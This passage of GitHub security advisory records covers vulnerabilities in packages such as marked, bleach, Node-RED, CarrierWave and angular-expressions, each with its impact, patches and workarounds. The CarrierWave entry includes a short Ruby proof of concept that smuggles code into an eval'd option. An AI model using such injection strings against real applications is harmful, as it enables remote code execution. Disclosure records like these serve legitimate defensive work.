versions of the package are vulnerable to a Denial of Service attack sending an OPTIONS request for an undefined route.",[],"[{'package': {'ecosystem': 'npm', 'name': 'sails'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.12.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/balderdashy/sails/commit/252b7b8c68d393acdde597c8b187945c629e4f6a'}]","{'cwe_ids': [], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2019-06-20T15:37:33Z', 'nvd_published_at': None}" +1.4.0,GHSA-c8m9-mh38-97p9,2021-02-24T19:40:41Z,2021-02-24T19:40:41Z,2021-02-24T19:40:41Z,[],XML external entity (XXE) vulnerability,An XML eXternal Entity (XXE) Injection was discovered in pmml-model before version 1.4.3. A remote attacker can exploit this vulnerability by sending a request to submit malicious External Entity references within the embedded XML metadata to the target system. ,[],"[{'package': {'ecosystem': 'Maven', 'name': 'org.jpmml:pmml-model'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.4.3'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/jpmml/jpmml-model/commit/494f821ee55e6b1f2949c78781c1d0fa8517867e#diff-322a783849e2119b37122dd21b0f48f2'}, {'type': 'WEB', 'url': 'https://www.whitesourcesoftware.com/vulnerability-database/WS-2019-0065'}]","{'cwe_ids': [], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2019-05-29T19:15:07Z', 'nvd_published_at': None}" +1.4.0,GHSA-4r62-v4vq-hr96,2021-02-08T21:17:26Z,2021-02-08T21:17:58Z,,['CVE-2021-21306'],Regular Expression Denial of Service (REDoS) in Marked,"### Impact +_What kind of vulnerability is it? Who is impacted?_ + +[Regular expression Denial of Service](https://owasp.org/www-community/attacks/Regular_expression_Denial_of_Service_-_ReDoS) + +A Denial of Service attack can affect anyone who runs user generated code through `marked`. + +### Patches +_Has the problem been patched? What versions should users upgrade to?_ + +patched in v2.0.0 + +### Workarounds +_Is there a way for users to fix or remediate the vulnerability without upgrading?_ + +None. + +### References +_Are there any links users can visit to find out more?_ + +https://github.com/markedjs/marked/issues/1927 +https://owasp.org/www-community/attacks/Regular_expression_Denial_of_Service_-_ReDoS + +### For more information +If you have any questions or comments about this advisory: +* Open an issue in [marked](https://github.com/markedjs/marked/issues)","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L'}]","[{'package': {'ecosystem': 'npm', 'name': 'marked'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.1.1'}, {'fixed': '2.0.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/markedjs/marked/security/advisories/GHSA-4r62-v4vq-hr96'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-21306'}, {'type': 'WEB', 'url': 'https://github.com/markedjs/marked/issues/1927'}, {'type': 'WEB', 'url': 'https://github.com/markedjs/marked/pull/1864'}, {'type': 'WEB', 'url': 'https://github.com/markedjs/marked/commit/7293251c438e3ee968970f7609f1a27f9007bccd'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/package/marked'}]","{'cwe_ids': ['CWE-400'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-02-08T21:17:26Z', 'nvd_published_at': '2021-02-08T22:15:00Z'}" +1.4.0,GHSA-vv2x-vrpj-qqpq,2023-08-23T22:57:36Z,2021-02-02T17:58:40Z,,['CVE-2021-23980'],Cross-site scripting in Bleach,"### Impact + +A [mutation XSS](https://cure53.de/fp170.pdf) affects users calling `bleach.clean` with all of: + +* `svg` or `math` in the allowed tags +* `p` or `br` in allowed tags +* `style`, `title`, `noscript`, `script`, `textarea`, `noframes`, `iframe`, or `xmp` in allowed tags +* the keyword argument `strip_comments=False` + +Note: none of the above tags are in the default allowed tags and `strip_comments` defaults to `True`. + +### Patches + +Users are encouraged to upgrade to bleach v3.3.0 or greater. + +Note: bleach v3.3.0 introduces a breaking change to escape HTML comments by default. + +### Workarounds + +* modify `bleach.clean` calls to at least one of: + * not allow the `style`, `title`, `noscript`, `script`, `textarea`, `noframes`, `iframe`, or `xmp` tag + * not allow `svg` or `math` tags + * not allow `p` or `br` tags + * set `strip_comments=True` + +* A strong [Content-Security-Policy](https://developer.mozilla.org/en-US/docs/Web/HTTP/CSP) without `unsafe-inline` and `unsafe-eval` [`script-src`s](https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Content-Security-Policy/script-src)) will also help mitigate the risk. + +### References + +* https://bugzilla.mozilla.org/show_bug.cgi?id=1689399 +* https://advisory.checkmarx.net/advisory/CX-2021-4303 +* https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-23980 +* https://cure53.de/fp170.pdf + +### Credits + +* Reported by [Yaniv Nizry](https://twitter.com/ynizry) from the CxSCA AppSec group at Checkmarx +* Additional eject tags not mentioned in the original advisory and the CSP mitigation line being truncated in the revised advisory reported by [Michał Bentkowski](https://twitter.com/SecurityMB) at Securitum + +### For more information + +If you have any questions or comments about this advisory: + +* Open an issue at [https://github.com/mozilla/bleach/issues](https://github.com/mozilla/bleach/issues) +* Email us at [security@mozilla.org](mailto:security@mozilla.org)","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'bleach'}, 'ecosystem_specific': {'affected_functions': ['bleach.clean']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.3.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/mozilla/bleach/security/advisories/GHSA-vv2x-vrpj-qqpq'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-23980'}, {'type': 'WEB', 'url': 'https://github.com/mozilla/bleach/commit/79b7a3c5e56a09d1d323a5006afa59b56162eb13'}, {'type': 'WEB', 'url': 'https://bugzilla.mozilla.org/show_bug.cgi?id=1689399'}, {'type': 'WEB', 'url': 'https://bugzilla.mozilla.org/show_bug.cgi?id=CVE-2021-23980'}, {'type': 'WEB', 'url': 'https://cure53.de/fp170.pdf'}, {'type': 'WEB', 'url': 'https://github.com/mozilla/bleach/blob/79b7a3c5e56a09d1d323a5006afa59b56162eb13/CHANGES#L4'}, {'type': 'WEB', 'url': 'https://pypi.org/project/bleach/'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-02-02T15:54:20Z', 'nvd_published_at': '2023-02-16T22:15:00Z'}" +1.4.0,GHSA-m33v-338h-4v9f,2021-02-26T16:23:34Z,2021-02-26T16:31:23Z,,['CVE-2021-21298'],Path traversal in Node-Red,"### Impact + +This vulnerability allows arbitrary path traversal via the Projects API. + +If the Projects feature is enabled, a user with `projects.read` permission is able to access any file via the Projects API. + +### Patches + +The issue has been patched in Node-RED 1.2.8 + +### Workarounds + +The vulnerability applies only to the Projects feature which is not enabled by default in Node-RED. + +The primary workaround is not give untrusted users read access to the Node-RED editor. + +### For more information +If you have any questions or comments about this advisory: +* Email us at [team@nodered.org](mailto:team@nodered.org) + +### Acknowledgements + +Thanks to the Tencent Woodpecker Security Team for disclosing this vulnerability.",[],"[{'package': {'ecosystem': 'npm', 'name': '@node-red/runtime'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.2.8'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/node-red/node-red/security/advisories/GHSA-m33v-338h-4v9f'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-21298'}, {'type': 'WEB', 'url': 'https://github.com/node-red/node-red/commit/74db3e17d075f23d9c95d7871586cf461524c456'}, {'type': 'WEB', 'url': 'https://github.com/node-red/node-red/releases/tag/1.2.8'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/package/@node-red/runtime'}]","{'cwe_ids': ['CWE-22'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2021-02-26T16:23:34Z', 'nvd_published_at': '2021-02-26T17:15:00Z'}" +1.4.0,GHSA-f5c9-x9j6-87qp,2023-08-08T19:28:24Z,2021-02-05T20:43:08Z,,['CVE-2021-25912'],Prototype pollution in dotty,Prototype pollution vulnerability in 'dotty' before version 0.1.1 allows attackers to cause a denial of service and may lead to remote code execution.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'dotty'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.1.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-25912'}, {'type': 'WEB', 'url': 'https://github.com/deoxxa/dotty/commit/cd997d37917186c131be71501a698803f2b7ebdb'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/package/dotty'}, {'type': 'WEB', 'url': 'https://www.whitesourcesoftware.com/vulnerability-database/CVE-2021-25912'}]","{'cwe_ids': ['CWE-400'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-02-03T07:41:22Z', 'nvd_published_at': '2021-02-02T19:15:00Z'}" +1.4.0,GHSA-cf3w-g86h-35x4,2022-04-27T19:58:17Z,2021-02-08T19:16:39Z,,['CVE-2021-21305'],Code Injection vulnerability in CarrierWave::RMagick,"### Impact +[CarrierWave::RMagick](https://github.com/carrierwaveuploader/carrierwave/blob/master/lib/carrierwave/processing/rmagick.rb) has a Code Injection vulnerability. Its `#manipulate!` method inappropriately evals the content of mutation option(`:read`/`:write`), allowing attackers to craft a string that can be executed as a Ruby code. +If an application developer supplies untrusted inputs to the option, it will lead to remote code execution(RCE). + +(But supplying untrusted input to the option itself is dangerous even in absence of this vulnerability, since is prone to DoS vulnerability - attackers can try to consume massive amounts of memory by resizing to a very large dimension) + +### Proof of Concept +```ruby +class MyUploader < CarrierWave::Uploader::Base + include CarrierWave::RMagick +end + +MyUploader.new.manipulate!({ read: { density: ""1 }; p 'Hacked'; {"" }}) # => shows ""Hacked"" +``` + +### Patches +Upgrade to [2.1.1](https://rubygems.org/gems/carrierwave/versions/2.1.1) or [1.3.2](https://rubygems.org/gems/carrierwave/versions/1.3.2). + +### Workarounds +Stop supplying untrusted input to `#manipulate!`'s mutation option. + +### References +[Code Injection Software Attack](https://owasp.org/www-community/attacks/Code_Injection) + +### For more information +If you have any questions or comments about this advisory: +* Open an issue in [CarrierWave repo](https://github.com/carrierwaveuploader/carrierwave) +* Email me at [mit.shibuya@gmail.com](mailto:mit.shibuya@gmail.com)","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:L'}]","[{'package': {'ecosystem': 'RubyGems', 'name': 'carrierwave'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.3.2'}]}]}, {'package': {'ecosystem': 'RubyGems', 'name': 'carrierwave'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.0.0'}, {'fixed': '2.1.1'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/carrierwaveuploader/carrierwave/security/advisories/GHSA-cf3w-g86h-35x4'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-21305'}, {'type': 'WEB', 'url': 'https://github.com/carrierwaveuploader/carrierwave/commit/387116f5c72efa42bc3938d946b4c8d2f22181b7'}, {'type': 'PACKAGE', 'url': 'https://github.com/carrierwaveuploader/carrierwave'}, {'type': 'WEB', 'url': 'https://github.com/carrierwaveuploader/carrierwave/blob/master/CHANGELOG.md#132---2021-02-08'}, {'type': 'WEB', 'url': 'https://github.com/carrierwaveuploader/carrierwave/blob/master/CHANGELOG.md#211---2021-02-08'}, {'type': 'WEB', 'url': 'https://github.com/rubysec/ruby-advisory-db/blob/master/gems/carrierwave/CVE-2021-21305.yml'}, {'type': 'WEB', 'url': 'https://rubygems.org/gems/carrierwave'}]","{'cwe_ids': ['CWE-74', 'CWE-94'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-02-08T18:51:46Z', 'nvd_published_at': '2021-02-08T20:15:00Z'}" +1.4.0,GHSA-9vhv-p9r7-rm53,2021-02-23T21:37:48Z,2021-02-23T21:37:48Z,2021-02-23T21:37:48Z,[],HTML tag injection,"Serve Handler, before 5.0.3, has a XSS via HTML tag injection in directory lisiting page.",[],"[{'package': {'ecosystem': 'npm', 'name': 'serve-handler'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '5.0.3'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/zeit/serve-handler/commit/65b4d4183a31a8076c78c40118acb0ca1b64f620'}, {'type': 'WEB', 'url': 'https://hackerone.com/reports/398285'}]","{'cwe_ids': [], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2019-06-06T08:49:37Z', 'nvd_published_at': None}" +1.4.0,GHSA-q594-2475-8v9f,2021-02-24T19:33:17Z,2021-02-24T19:33:17Z,2021-02-24T19:33:17Z,[],Unencrypted passwords,A vulnerability found in Apache NIFI before v0.4.0-RC2. Passwords of InvokeHTTP weren?t encrypted.,[],"[{'package': {'ecosystem': 'Maven', 'name': 'org.apache.nifi:nifi-standard-processors'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.4.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/apache/nifi/commit/b4bfcc1f21fed3209bf4a8f187616cdbb3d1a5c9'}]","{'cwe_ids': [], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2019-10-25T17:13:12Z', 'nvd_published_at': None}" +1.4.0,GHSA-8wp3-cp9v-44fm,2021-02-25T02:01:15Z,2021-02-25T02:01:15Z,2021-02-25T02:01:15Z,[],Cross-Site Scripting in marked,Versions 0.3.7 and earlier of marked unescape only lowercase while owsers support both lowercase and uppercase x in hexadecimal form of HTML character entity,[],"[{'package': {'ecosystem': 'npm', 'name': 'marked'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.3.9'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/markedjs/marked/issues/925'}, {'type': 'WEB', 'url': 'https://github.com/markedjs/marked/commit/6d1901ff71abb83aa32ca9a5ce47471382ea42a9'}]","{'cwe_ids': [], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2019-06-05T12:47:45Z', 'nvd_published_at': None}" +1.4.0,GHSA-fwcm-636p-68r5,2023-05-16T15:41:50Z,2021-02-08T19:16:26Z,,['CVE-2021-21288'],Server-side request forgery in CarrierWave,"### Impact +[CarrierWave download feature](https://github.com/carrierwaveuploader/carrierwave#uploading-files-from-a-remote-location) has an SSRF vulnerability, allowing attacks to provide DNS entries or IP addresses that are intended for internal use and gather information about the Intranet infrastructure of the platform. + +### Patches +Upgrade to [2.1.1](https://rubygems.org/gems/carrierwave/versions/2.1.1) or [1.3.2](https://rubygems.org/gems/carrierwave/versions/1.3.2). + +### Workarounds +Using proper network segmentation and applying the principle of least privilege to outbound connections from application servers can reduce the severity of SSRF vulnerabilities. Ideally the vulnerable gem should run on an isolated server without access to any internal network resources or cloud metadata access. + +### References +[Server-Side Request Forgery Prevention Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Server_Side_Request_Forgery_Prevention_Cheat_Sheet.html) + +### For more information +If you have any questions or comments about this advisory: +* Open an issue in [CarrierWave repo](https://github.com/carrierwaveuploader/carrierwave) +* Email me at [mit.shibuya@gmail.com](mailto:mit.shibuya@gmail.com)","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N'}]","[{'package': {'ecosystem': 'RubyGems', 'name': 'carrierwave'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.3.2'}]}]}, {'package': {'ecosystem': 'RubyGems', 'name': 'carrierwave'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.0.0'}, {'fixed': '2.1.1'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/carrierwaveuploader/carrierwave/security/advisories/GHSA-fwcm-636p-68r5'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-21288'}, {'type': 'WEB', 'url': 'https://github.com/carrierwaveuploader/carrierwave/commit/012702eb3ba1663452aa025831caa304d1a665c0'}, {'type': 'PACKAGE', 'url': 'https://github.com/carrierwaveuploader/carrierwave'}, {'type': 'WEB', 'url': 'https://github.com/carrierwaveuploader/carrierwave/blob/master/CHANGELOG.md#132---2021-02-08'}, {'type': 'WEB', 'url': 'https://github.com/carrierwaveuploader/carrierwave/blob/master/CHANGELOG.md#211---2021-02-08'}, {'type': 'WEB', 'url': 'https://github.com/rubysec/ruby-advisory-db/blob/master/gems/carrierwave/CVE-2021-21288.yml'}, {'type': 'WEB', 'url': 'https://rubygems.org/gems/carrierwave/'}]","{'cwe_ids': ['CWE-918'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-02-08T18:51:29Z', 'nvd_published_at': '2021-02-08T20:15:00Z'}" +1.4.0,GHSA-29q4-gxjq-rx5c,2021-02-10T01:48:45Z,2021-02-10T02:31:53Z,,['CVE-2021-21479'],Remote Code Execution in SCIMono,"### Impact +It is possible for attacker to inject and execute java expression and compromising the availability and integrity of the system. + +### Patches +The issue was fixed on [0.0.19 version](https://mvnrepository.com/artifact/com.sap.scimono/scimono-server/0.0.19)",[],"[{'package': {'ecosystem': 'Maven', 'name': 'com.sap.scimono:scimono-server'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.0.19'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/SAP/scimono/security/advisories/GHSA-29q4-gxjq-rx5c'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-21479'}, {'type': 'WEB', 'url': 'https://github.com/SAP/scimono/commit/413b5d75fa94e77876af0e47be76475a23745b80'}, {'type': 'WEB', 'url': 'https://mvnrepository.com/artifact/com.sap.scimono/scimono-server/0.0.19'}]","{'cwe_ids': ['CWE-59', 'CWE-62', 'CWE-690', 'CWE-74', 'CWE-77', 'CWE-917'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-02-10T01:48:45Z', 'nvd_published_at': '2021-02-09T21:15:00Z'}" +1.4.0,GHSA-2m8v-572m-ff2v,2021-02-16T16:50:49Z,2021-02-16T16:51:04Z,,['CVE-2021-21315'],Command Injection Vulnerability,"### Impact +command injection vulnerability + +### Patches +Problem was fixed with a parameter check. Please upgrade to version >= 5.3.1 + +### Workarounds +If you cannot upgrade, be sure to check or sanitize service parameters that are passed to si.inetLatency(), si.inetChecksite(), si.services(), si.processLoad() ... do only allow strings, reject any arrays. String sanitation works as expected.",[],"[{'package': {'ecosystem': 'npm', 'name': 'systeminformation'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '5.3.1'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/sebhildebrandt/systeminformation/security/advisories/GHSA-2m8v-572m-ff2v'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-21315'}, {'type': 'WEB', 'url': 'https://github.com/sebhildebrandt/systeminformation/commit/07daa05fb06f24f96297abaa30c2ace8bfd8b525'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r8afea9a83ed568f2647cccc6d8d06126f9815715ddf9a4d479b26b05@%3Cissues.cordova.apache.org%3E'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20210312-0007/'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/package/systeminformation'}]","{'cwe_ids': ['CWE-78'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-02-16T16:50:49Z', 'nvd_published_at': '2021-02-16T17:15:00Z'}" +1.4.0,GHSA-j6px-jwvv-vpwq,2022-10-20T13:26:13Z,2021-02-01T15:01:26Z,,['CVE-2021-21277'],Angular Expressions - Remote Code Execution,"### Impact + +The vulnerability, reported by GoSecure Inc, allows Remote Code Execution, if you call `expressions.compile(userControlledInput)` where `userControlledInput` is text that comes from user input. + +This time, the security of the package could be bypassed by using a more complex payload, using a `.constructor.constructor` technique. + +* If running angular-expressions in the browser, an attacker could run any browser script when the application code calls expressions.compile(userControlledInput). +* If running angular-expressions on the server, an attacker could run any Javascript expression, thus gaining Remote Code Execution. + +### Patches + +Users should upgrade to version 1.1.2 of angular-expressions + +### Workarounds + +A temporary workaround might be either to : + +* disable user-controlled input that will be fed into angular-expressions in your application + +OR + +* allow only following characters in the userControlledInput : + +```js +if (/^[|a-zA-Z.0-9 :""'+-?]+$/.test(userControlledInput)) { + var result = expressions.compile(userControlledInput); +} +else { + result = undefined; +} +``` + +### References + +[Removal of angular-expression sandbox](http://blog.angularjs.org/2016/09/angular-16-expression-sandbox-removal.html) + +### For more information + +If you have any questions or comments about this advisory: +* Open an issue in [angular-expressions](https://github.com/peerigon/angular-expressions/issues) +* [Email us](mailto:contact@javascript-ninja.fr) + +### Credits + +The issue was reported by Maxime Nadeau from GoSecure, Inc.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'angular-expressions'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.1.2'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/peerigon/angular-expressions/security/advisories/GHSA-j6px-jwvv-vpwq'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-21277'}, {'type': 'WEB', 'url': 'https://github.com/peerigon/angular-expressions/commit/07edb62902b1f6127b3dcc013da61c6316dd0bf1'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/package/angular-expressions'}, {'type': 'WEB', 'url': 'http://blog.angularjs.org/2016/09/angular-16-expression-sandbox-removal.html'}]","{'cwe_ids': ['CWE-74', 'CWE-94'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-02-01T15:00:53Z', 'nvd_published_at': '2021-02-01T15:15:00Z'}" +1.4.0,GHSA-57h7-r3q3-w57j,2021-02-24T19:46:00Z,2021-02-24T19:46:00Z,2021-02-24T19:46:00Z,[],Cross-Site Scripting,"Django-Rest-Framework, before 3.9.1, has a XSS vulnerability caused by disabled autoescaping in the default DRF Browsable API view templates.",[],"[{'package': {'ecosystem': 'PyPI', 'name': 'djangorestframework'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.9.1'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/encode/django-rest-framework/pull/6330'}, {'type': 'WEB', 'url': 'https://github.com/encode/django-rest-framework/commit/343ce4a03cad02631752a5e9bde26218fd647c14'}, {'type': 'WEB', 'url': 'https://github.com/encode/django-rest-framework/commit/75a489150ae24c2f3c794104a8e98fa43e2c9ce9'}]","{'cwe_ids': [], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2019-05-22T15:03:51Z', 'nvd_published_at': None}" +1.4.0,GHSA-rrqm-p222-8ph2,2022-05-26T19:58:25Z,2021-02-08T17:44:01Z,,['CVE-2021-21304'],Prototype Pollution in Dynamoose,"### Impact + +In Dynamoose versions 2.0.0-2.6.0 there was a prototype pollution vulnerability in the internal utility method [`lib/utils/object/set.ts`](https://github.com/dynamoose/dynamoose/blob/master/lib/utils/object/set.ts). This method is used throughout the codebase for various operations throughout Dynamoose. + +We have not seen any evidence of this vulnerability being exploited. + +We do not believe this issue impacts v1.x.x since this method was added as part of the v2 rewrite. This vulnerability also impacts v2.x.x beta/alpha versions. + +### Patches + +v2.7.0 includes a patch for this vulnerability. + +### Workarounds + +We are unaware of any workarounds to patch this vulnerability other than upgrading to v2.7.0 or greater. + +### References + +- Patch commit hash: 324c62b4709204955931a187362f8999805b1d8e + +### For more information + +If you have any questions or comments about this advisory: + +* [Contact me](https://charlie.fish/contact) +* [Read our Security Policy](https://github.com/dynamoose/dynamoose/blob/master/SECURITY.md) + +### Credit + +- GitHub CodeQL Code Scanning","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'dynamoose'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.0.0'}, {'fixed': '2.7.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/dynamoose/dynamoose/security/advisories/GHSA-rrqm-p222-8ph2'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-21304'}, {'type': 'WEB', 'url': 'https://github.com/dynamoose/dynamoose/commit/324c62b4709204955931a187362f8999805b1d8e'}, {'type': 'PACKAGE', 'url': 'https://github.com/dynamoose/dynamoose'}, {'type': 'WEB', 'url': 'https://github.com/dynamoose/dynamoose/releases/tag/v2.7.0'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/package/dynamoose'}]","{'cwe_ids': ['CWE-1321', 'CWE-915'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-02-08T17:43:18Z', 'nvd_published_at': '2021-02-08T18:15:00Z'}" +1.4.0,GHSA-xp9c-82x8-7f67,2021-09-22T13:55:00Z,2021-02-26T16:31:05Z,,['CVE-2021-21297'],Prototype Pollution in Node-Red,"### Impact + +Node-RED 1.2.7 and earlier contains a Prototype Pollution vulnerability in the admin API. A badly formed request can modify the prototype of the default JavaScript Object with the potential to affect the default behaviour of the Node-RED runtime. + +### Patches + +The vulnerability is patched in the 1.2.8 release. + +### Workarounds + +A workaround is to ensure only authorised users are able to access the editor url. + +### For more information +If you have any questions or comments about this advisory: +* Email us at [team@nodered.org](mailto:team@nodered.org) + +### Acknowledgements + +Thanks to the Tencent Woodpecker Security Team for disclosing this vulnerability.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:N/I:H/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': '@node-red/runtime'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.2.8'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/node-red/node-red/security/advisories/GHSA-xp9c-82x8-7f67'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-21297'}, {'type': 'PACKAGE', 'url': 'https://github.com/node-red/node-red'}, {'type': 'WEB', 'url': 'https://github.com/node-red/node-red/releases/tag/1.2.8'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/package/@node-red/editor-api'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/package/@node-red/runtime'}]","{'cwe_ids': ['CWE-1321', 'CWE-915'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-02-26T16:22:38Z', 'nvd_published_at': '2021-02-26T17:15:00Z'}" +1.4.0,GHSA-wj5j-xpcj-45gc,2021-02-24T19:17:37Z,2021-02-24T19:17:37Z,2021-02-24T19:17:37Z,[],Cross-Site Request Forgery (CSRF),"# Withdrawn + +Affected versions of the package are vulnerable to Cross-Site Request Forgery (CSRF) attacks.",[],"[{'package': {'ecosystem': 'RubyGems', 'name': 'devise_invitable'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.3.5'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/scambra/devise_invitable/issues/457'}, {'type': 'WEB', 'url': 'https://github.com/scambra/devise_invitable/commit/d1bb19efca8e35885e1c2f0931d6171fce8cf74e'}, {'type': 'WEB', 'url': 'https://www.sourceclear.com/vulnerability-database/security/cross-site-request-forgery-csrf/ruby/sid-2272/'}]","{'cwe_ids': ['CWE-352'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2019-06-26T01:06:20Z', 'nvd_published_at': None}" +1.4.0,GHSA-q88g-qx42-xfrh,2021-02-24T06:53:21Z,2021-02-18T20:51:56Z,,['CVE-2021-27367'],Path traversal in bolt/core,Controller/Backend/FileEditController.php and Controller/Backend/FilemanagerController.php in Bolt before 4.1.13 allow Directory Traversal.,[],"[{'package': {'ecosystem': 'Packagist', 'name': 'bolt/core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '4.1.13'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-27367'}, {'type': 'WEB', 'url': 'https://github.com/bolt/core/pull/2371'}, {'type': 'WEB', 'url': 'https://github.com/bolt/core/releases/tag/4.1.13'}, {'type': 'WEB', 'url': 'https://packagist.org/packages/bolt/core'}]","{'cwe_ids': ['CWE-22'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-02-18T17:53:12Z', 'nvd_published_at': '2021-02-17T21:15:00Z'}" +1.4.0,GHSA-pj4g-4488-wmxm,2021-09-27T22:48:17Z,2021-02-17T19:50:58Z,,['CVE-2019-16328'],Dynamic modification of RPyC service due to missing security check,"### Impact +Version 4.1.0 of RPyC has a vulnerability that affects 